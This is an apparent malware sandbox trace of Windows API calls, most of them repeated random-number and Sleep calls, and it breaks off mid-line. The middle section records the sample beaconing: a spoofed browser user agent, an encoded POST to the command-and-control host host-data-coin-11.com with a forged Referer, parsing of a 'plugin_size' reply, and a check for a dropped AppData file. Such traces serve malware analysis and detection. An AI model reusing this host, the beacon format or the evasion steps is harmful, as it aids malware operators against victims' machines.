[0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x699edf62 [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x64e1efeb [0215.076] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1adf34d8 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x38fdf99 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x8593c82 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5a14273b [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3769ab46 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1b076e4 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x57a32b34 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3e9d0798 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1092e7d5 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x34e52906 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x42dd7926 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x58ddd058 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x557083f2 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1becb231 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6197a3bb [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x710189cc [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x162144fc [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2d1cb24e [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5686f60f [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7b219a07 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7f699b69 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xbb74b6a [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x507ee354 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2cf6fd3 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2267031c [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5d506ea3 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2b13daf3 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4a41af14 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5c90eb7f [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xa5ff3c3 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x667153d7 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6d4e48b0 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x76cb8393 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5b82b74a [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x57918a46 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x22812cc0 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6a82b2a9 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x21bcc920 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5ca6a3a5 [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x38b820fa [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3eb3c2ec [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x12eada3f [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x66f7491d [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5bcafd6c [0215.077] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x204d58bd [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x44385655 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x69e6a888 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x21701a9 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7dcf70c8 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x251e1de5 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3153f46e [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xbba2e1f [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7a5438b3 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1e064276 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x13f6dc15 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7c487e1c [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3b66f48f [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x619f30c7 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6985bc6d [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x45ed3bfd [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7b711df1 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x57ecdced [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7207f019 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2f838f23 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x28bfef47 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x462019f2 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5297c7bd [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4b57898 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x255fb1ba [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x48a7b02c [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x638f5373 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x175c4b23 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6ec79e2c [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x14c1c7c7 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x54aeb4af [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x22ce91b8 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6614031c [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x413390f2 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7f6182e2 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3b29ea38 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2037402c [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x467db8b8 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x75ba0141 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x10cf1c83 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4d6a22ed [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1498c00b [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x35d6e932 [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xabf761b [0215.078] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x26ee2d5d [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3eb3d9f [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6b9f93a4 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x75ef4d00 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7058cd90 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x58991950 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x717ec171 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x78b29617 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x53c21ff5 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2141a361 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x46caebd0 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2d12bd0f [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xa701217 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2fa73618 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x818d001 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x432d9d8d [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2ce8c194 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1153121c [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x347ee588 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x526aba58 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xa931250 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x276e211b [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x74b09a80 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xbccc8b4 [0215.079] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x71504af2 [0215.079] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x133) returned 0x7f524a0 [0215.079] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0215.079] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0215.079] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0215.079] lstrcatA (in: lpString1="", lpString2="T`:BG\"T\"d0hM^72SX513L_q2MNL\\`)]Za2yP!^101'>uie(f(#h%m/))_LEYyS-GRAYVGBzI_$oL)$\"KI!#^R[z]qMrPQ7\\/wc3^b#sM/R7x#.wy?3TyYq]X.q?/^nZ]srQJ.CLB`?\\ySWLC\"-wV\"9J:ulM:'pTIJqtV:$,lJJ\"9r7?WDlOhjMQUI]]GH(RNI\"fVs=W1Drj.IxLU\"DAwoi?\\%g/" | out: lpString1="T`:BG\"T\"d0hM^72SX513L_q2MNL\\`)]Za2yP!^101'>uie(f(#h%m/))_LEYyS-GRAYVGBzI_$oL)$\"KI!#^R[z]qMrPQ7\\/wc3^b#sM/R7x#.wy?3TyYq]X.q?/^nZ]srQJ.CLB`?\\ySWLC\"-wV\"9J:ulM:'pTIJqtV:$,lJJ\"9r7?WDlOhjMQUI]]GH(RNI\"fVs=W1Drj.IxLU\"DAwoi?\\%g/") returned="T`:BG\"T\"d0hM^72SX513L_q2MNL\\`)]Za2yP!^101'>uie(f(#h%m/))_LEYyS-GRAYVGBzI_$oL)$\"KI!#^R[z]qMrPQ7\\/wc3^b#sM/R7x#.wy?3TyYq]X.q?/^nZ]srQJ.CLB`?\\ySWLC\"-wV\"9J:ulM:'pTIJqtV:$,lJJ\"9r7?WDlOhjMQUI]]GH(RNI\"fVs=W1Drj.IxLU\"DAwoi?\\%g/" [0215.079] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10c) returned 0x7f525e0 [0215.079] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0215.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f52300, cbMultiByte=30, lpWideCharStr=0x7f525e0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0215.080] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x6e6fbf8 | out: pProxyConfig=0x6e6fbf8) returned 1 [0215.102] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3faf720 [0215.104] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x6e6fcb0 | out: lpUrlComponents=0x6e6fcb0) returned 1 [0215.104] WinHttpConnect (hSession=0x3faf720, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83a90 [0215.105] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52700 [0215.105] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x68) returned 0x7f52720 [0215.105] WinHttpOpenRequest (hConnect=0x3f83a90, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x7149a30 [0215.105] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x4e) returned 0x7f52790 [0215.105] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10d) returned 0x7f527f0 [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5b946698 [0215.105] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52910 [0215.105] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x17) returned 0x7f52930 [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x690aa9ab [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6a0fe9ae [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x67d1dd43 [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1712cb14 [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x569503bd [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x19c18b94 [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x50ece0c0 [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x60046bee [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5aaf32cc [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xae19179 [0215.105] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x9c3c976 [0215.105] wsprintfW (in: param_1=0x7f527f0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://ipewfmktbn.org/") returned 44 [0215.106] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52930) returned 0x17 [0215.106] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52930) returned 1 [0215.106] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52910) returned 0x12 [0215.106] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52910) returned 1 [0215.106] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52790) returned 0x4e [0215.106] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52790) returned 1 [0215.106] WinHttpAddRequestHeaders (hRequest=0x7149a30, pwszHeaders="Accept: */*\r\nReferer: http://ipewfmktbn.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0215.106] WinHttpSendRequest (hRequest=0x7149a30, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x7f524a0*, dwOptionalLength=0x12a, dwTotalLength=0x12a, dwContext=0x0) returned 1 [0215.290] WinHttpReceiveResponse (hRequest=0x7149a30, lpReserved=0x0) returned 1 [0215.290] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x2800) returned 0x7f52910 [0215.290] WinHttpReadData (in: hRequest=0x7149a30, lpBuffer=0x7f52910, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x6e6fd68 | out: lpBuffer=0x7f52910*, lpdwNumberOfBytesRead=0x6e6fd68*=0x18) returned 1 [0215.294] RtlReAllocateHeap (Heap=0x7f50000, Flags=0x8, Ptr=0x7f52910, Size=0x5000) returned 0x7f52910 [0215.294] WinHttpReadData (in: hRequest=0x7149a30, lpBuffer=0x7f52928, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x6e6fd68 | out: lpBuffer=0x7f52928*, lpdwNumberOfBytesRead=0x6e6fd68*=0x0) returned 1 [0215.295] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x25b0000 [0215.297] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52910) returned 1 [0215.297] WinHttpCloseHandle (hInternet=0x7149a30) returned 1 [0215.297] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f527f0) returned 0x10d [0215.297] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f527f0) returned 1 [0215.298] WinHttpCloseHandle (hInternet=0x3f83a90) returned 1 [0215.298] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52720) returned 0x68 [0215.298] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52720) returned 1 [0215.298] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52700) returned 0x12 [0215.298] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52700) returned 1 [0215.298] WinHttpCloseHandle (hInternet=0x3faf720) returned 1 [0215.298] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f525e0) returned 0x10c [0215.299] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f525e0) returned 1 [0215.299] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f523b0) returned 0xe4 [0215.299] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f523b0) returned 1 [0215.299] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f524a0) returned 0x133 [0215.300] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f524a0) returned 1 [0215.300] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0215.300] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x15) returned 0x7f523b0 [0215.300] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0215.300] lstrlenA (lpString="plugin_size") returned 11 [0215.300] atoi (_Str="0") returned 0 [0215.300] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0215.300] lstrlenA (lpString="|:|") returned 3 [0215.300] MapViewOfFile (hFileMappingObject=0x1588, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x25d0000 [0215.309] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0215.310] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x25d0000) returned 0x0 [0215.346] atoi (_Str="0") returned 0 [0215.347] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.348] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x26 [0215.349] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0215.350] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0215.350] Sleep (dwMilliseconds=0x258) [0215.360] Sleep (dwMilliseconds=0x258) [0215.375] Sleep (dwMilliseconds=0x258) [0215.439] Sleep (dwMilliseconds=0x258) [0215.486] Sleep (dwMilliseconds=0x258) [0215.507] Sleep (dwMilliseconds=0x258) [0215.516] Sleep (dwMilliseconds=0x258) [0215.532] Sleep (dwMilliseconds=0x258) [0215.547] Sleep (dwMilliseconds=0x258) [0215.563] Sleep (dwMilliseconds=0x258) [0215.578] Sleep (dwMilliseconds=0x258) [0215.641] Sleep (dwMilliseconds=0x258) [0215.688] Sleep (dwMilliseconds=0x258) [0215.715] Sleep (dwMilliseconds=0x258) [0215.719] Sleep (dwMilliseconds=0x258) [0215.735] Sleep (dwMilliseconds=0x258) [0215.750] Sleep (dwMilliseconds=0x258) [0215.765] Sleep (dwMilliseconds=0x258) [0215.781] Sleep (dwMilliseconds=0x258) [0215.857] Sleep (dwMilliseconds=0x258) [0215.908] Sleep (dwMilliseconds=0x258) [0215.945] Sleep (dwMilliseconds=0x258) [0215.953] Sleep (dwMilliseconds=0x258) [0215.971] Sleep (dwMilliseconds=0x258) [0215.984] Sleep (dwMilliseconds=0x258) [0215.999] Sleep (dwMilliseconds=0x258) [0216.077] Sleep (dwMilliseconds=0x258) [0216.124] Sleep (dwMilliseconds=0x258) [0216.163] Sleep (dwMilliseconds=0x258) [0216.172] Sleep (dwMilliseconds=0x258) [0216.187] Sleep (dwMilliseconds=0x258) [0216.202] Sleep (dwMilliseconds=0x258) [0216.219] Sleep (dwMilliseconds=0x258) [0216.233] Sleep (dwMilliseconds=0x258) [0216.297] Sleep (dwMilliseconds=0x258) [0216.344] Sleep (dwMilliseconds=0x258) [0216.375] Sleep (dwMilliseconds=0x258) [0216.390] Sleep (dwMilliseconds=0x258) [0216.406] Sleep (dwMilliseconds=0x258) [0216.421] Sleep (dwMilliseconds=0x258) [0216.437] Sleep (dwMilliseconds=0x258) [0216.452] Sleep (dwMilliseconds=0x258) [0216.515] Sleep (dwMilliseconds=0x258) [0216.561] Sleep (dwMilliseconds=0x258) [0216.590] Sleep (dwMilliseconds=0x258) [0216.592] Sleep (dwMilliseconds=0x258) [0216.609] Sleep (dwMilliseconds=0x258) [0216.626] Sleep (dwMilliseconds=0x258) [0216.639] Sleep (dwMilliseconds=0x258) [0216.655] Sleep (dwMilliseconds=0x258) [0216.717] Sleep (dwMilliseconds=0x258) [0216.767] Sleep (dwMilliseconds=0x258) [0216.786] Sleep (dwMilliseconds=0x258) [0216.795] Sleep (dwMilliseconds=0x258) [0216.811] Sleep (dwMilliseconds=0x258) [0216.826] Sleep (dwMilliseconds=0x258) [0216.843] Sleep (dwMilliseconds=0x258) [0216.859] Sleep (dwMilliseconds=0x258) [0216.920] Sleep (dwMilliseconds=0x258) [0216.968] Sleep (dwMilliseconds=0x258) [0216.990] Sleep (dwMilliseconds=0x258) [0216.998] Sleep (dwMilliseconds=0x258) [0217.016] Sleep (dwMilliseconds=0x258) [0217.029] Sleep (dwMilliseconds=0x258) [0217.065] Sleep (dwMilliseconds=0x258) [0217.130] Sleep (dwMilliseconds=0x258) [0217.170] Sleep (dwMilliseconds=0x258) [0217.187] Sleep (dwMilliseconds=0x258) [0217.201] Sleep (dwMilliseconds=0x258) [0217.216] Sleep (dwMilliseconds=0x258) [0217.232] Sleep (dwMilliseconds=0x258) [0217.248] Sleep (dwMilliseconds=0x258) [0217.263] Sleep (dwMilliseconds=0x258) [0217.325] Sleep (dwMilliseconds=0x258) [0217.373] Sleep (dwMilliseconds=0x258) [0217.400] Sleep (dwMilliseconds=0x258) [0217.413] Sleep (dwMilliseconds=0x258) [0217.419] Sleep (dwMilliseconds=0x258) [0217.435] Sleep (dwMilliseconds=0x258) [0217.450] Sleep (dwMilliseconds=0x258) [0217.466] Sleep (dwMilliseconds=0x258) [0217.482] Sleep (dwMilliseconds=0x258) [0217.545] Sleep (dwMilliseconds=0x258) [0217.591] Sleep (dwMilliseconds=0x258) [0217.609] Sleep (dwMilliseconds=0x258) [0217.623] Sleep (dwMilliseconds=0x258) [0217.641] Sleep (dwMilliseconds=0x258) [0217.654] Sleep (dwMilliseconds=0x258) [0217.669] Sleep (dwMilliseconds=0x258) [0217.684] Sleep (dwMilliseconds=0x258) [0217.747] Sleep (dwMilliseconds=0x258) [0217.794] Sleep (dwMilliseconds=0x258) [0217.812] Sleep (dwMilliseconds=0x258) [0217.825] Sleep (dwMilliseconds=0x258) [0217.847] Sleep (dwMilliseconds=0x258) [0217.856] Sleep (dwMilliseconds=0x258) [0217.872] Sleep (dwMilliseconds=0x258) [0217.887] Sleep (dwMilliseconds=0x258) [0217.950] Sleep (dwMilliseconds=0x258) [0217.997] Sleep (dwMilliseconds=0x258) [0218.024] Sleep (dwMilliseconds=0x258) [0218.036] Sleep (dwMilliseconds=0x258) [0218.060] Sleep (dwMilliseconds=0x258) [0218.074] Sleep (dwMilliseconds=0x258) [0218.090] Sleep (dwMilliseconds=0x258) [0218.153] Sleep (dwMilliseconds=0x258) [0218.200] Sleep (dwMilliseconds=0x258) [0218.235] Sleep (dwMilliseconds=0x258) [0218.246] Sleep (dwMilliseconds=0x258) [0218.262] Sleep (dwMilliseconds=0x258) [0218.277] Sleep (dwMilliseconds=0x258) [0218.293] Sleep (dwMilliseconds=0x258) [0218.309] Sleep (dwMilliseconds=0x258) [0218.371] Sleep (dwMilliseconds=0x258) [0218.428] Sleep (dwMilliseconds=0x258) [0218.439] Sleep (dwMilliseconds=0x258) [0218.449] Sleep (dwMilliseconds=0x258) [0218.464] Sleep (dwMilliseconds=0x258) [0218.480] Sleep (dwMilliseconds=0x258) [0218.496] Sleep (dwMilliseconds=0x258) [0218.511] Sleep (dwMilliseconds=0x258) [0218.574] Sleep (dwMilliseconds=0x258) [0218.620] Sleep (dwMilliseconds=0x258) [0218.654] Sleep (dwMilliseconds=0x258) [0218.667] Sleep (dwMilliseconds=0x258) [0218.683] Sleep (dwMilliseconds=0x258) [0218.698] Sleep (dwMilliseconds=0x258) [0218.714] Sleep (dwMilliseconds=0x258) [0218.778] Sleep (dwMilliseconds=0x258) [0218.824] Sleep 